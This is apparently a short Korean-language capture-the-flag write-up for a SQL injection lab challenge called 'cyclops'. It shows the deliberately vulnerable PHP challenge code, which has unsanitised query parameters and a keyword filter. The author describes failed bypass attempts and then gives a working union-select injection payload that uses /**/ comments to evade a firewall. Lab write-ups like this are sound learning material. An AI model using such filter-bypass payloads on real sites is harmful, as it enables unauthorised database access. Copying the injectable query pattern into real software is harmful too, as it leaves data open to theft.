cyclops-writeup

<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  $query = "select id,pw from prob_cyclops where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['id'] === "first") && ($result['pw'] === "second")) solve("cyclops");//must use union select
  highlight_file(__FILE__);
?>

 

union select를 쓰라고 친절하게 설명이 돼있었다.

그래놓고 union select를 쓰면 방화벽에 막힌다 ㅎ...

그래서 여러 방법을 써봤다. #+개행문자 라던지

url encoding을 쓴다던지 근데 안된다 !ㅎㅎ

마지막으로/**/을 사용하니 다행히 뚫렸다

 

id=%27<@=1%20union/**/select%20%27first%27,%27second%27%23

 

CLEAR!!!